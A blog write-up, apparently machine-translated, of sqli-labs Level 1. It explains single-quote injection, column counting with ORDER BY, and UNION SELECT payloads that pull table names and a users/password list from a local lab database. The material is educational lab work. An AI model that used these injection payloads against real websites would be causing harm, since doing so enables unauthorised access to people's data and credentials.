当前位置:网站首页>Sqli labs level 1
Sqli labs level 1
2022-07-02 08:33:00 【Defeat of Fujiwara Qianhua】
A record article written hastily
Concept
SQL Injection is to splice malicious code into normal database queries , Cause database information leakage and other hazards .
I think
To understand SQL Inject , Need a little knowledge of Network Planning , Better know Web The whole process of development , What technologies are used in the middle , Why do you need this technology . Of course , You first have to understand databases and SQL Inquire about , And programming language and SQL The combination of languages ( Recommend a Book 《 Introduction to Database System 》). With these foundations ,SQL Injection will naturally understand .
Customs clearance ideas
Input id, Login normal 
Try closing statement 
Single quote error , It is speculated that the backend query statement is :
select * from table where id = ’ input ’
adopt order by enumeration , The number of fields is 3
Because there is a lot of echo information , Priority joint injection 
It can be seen from the above figure , The first 2、 The first 3 Fields are echo information , Therefore, it can be constructed payload, Start injecting
Library name :
Table name :
http://127.0.0.1/sqli-labs/Less-1/?id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’ --+
Field name :
Field contents :
union select 1,2,group_concat(users,0x7e,password) from users --+
I've read several tutorials and the records when doing questions
1、 Different input id, There are different echo results , Guess backstage sql Statement for :select * from table where id= input;
2、 Single quote test , Report errors , Speculation backstage sql Statement for :select * from table where id = ‘input’;
3、 Construction statement , Single quote closure ,order by 4 error ---->3 Column fields ,select 1,2,3,–> Echo location ;
4、 Joint injection : union select 1,2,( Construct statements to query information )–+
1. Look for loopholes
2. Guess the number of fields
3. Get the database name
4. Look up the table
5. Check the field name and field value
边栏推荐
- 【无标题】
- 路由基础—动态路由
- 程序猿学英语-指令式编程
- Installation and use of simple packaging tools
- OpenCV关于x,y坐标容易混淆的心得
- Static library and dynamic library
- [dynamic planning] p4170: coloring (interval DP)
- When a custom exception encounters reflection
- St-link connection error invalid ROM table of STM32 difficult and miscellaneous diseases
- 群辉 NAS 配置 iSCSI 存储
猜你喜欢
Use the kaggle training model and download your own training model
Opencv3 6.3 reduced pixel sampling with filters
Generate database documents with one click, which can be called swagger in the database industry
群辉 NAS 配置 iSCSI 存储
使用wireshark抓取Tcp三次握手
HCIA—應用層
旋转链表(图解说明)
Don't know mock test yet? An article to familiarize you with mock
文件上传-upload-labs
STM32疑难杂症之ST-LINK Connection error INVALID ROM TABLE
随机推荐
Learn to write article format
Call Stack
Sqlyog remote connection to MySQL database under centos7 system
Static library and dynamic library
DWORD ptr[]
Jz-061-serialized binary tree
Data asset management function
HCIA - application layer
Carsim-问题Failed to start Solver: PATH_ID_OBJ(X) was set to Y; no corresponding value of XXXXX?
Network security - summary and thinking of easy-to-use fuzzy tester
程序猿学英语-Learning C
Viewing JS array through V8
Linked list classic interview questions (reverse the linked list, middle node, penultimate node, merge and split the linked list, and delete duplicate nodes)
HCIA—应用层
程序猿学英语-指令式编程
In depth understanding of prototype drawings
Web security -- Logical ultra vires
VS Code配置问题
双向链表的实现(双向链表与单向链表的简单区别联系和实现)
Carla-ue4editor import Roadrunner map file (nanny level tutorial)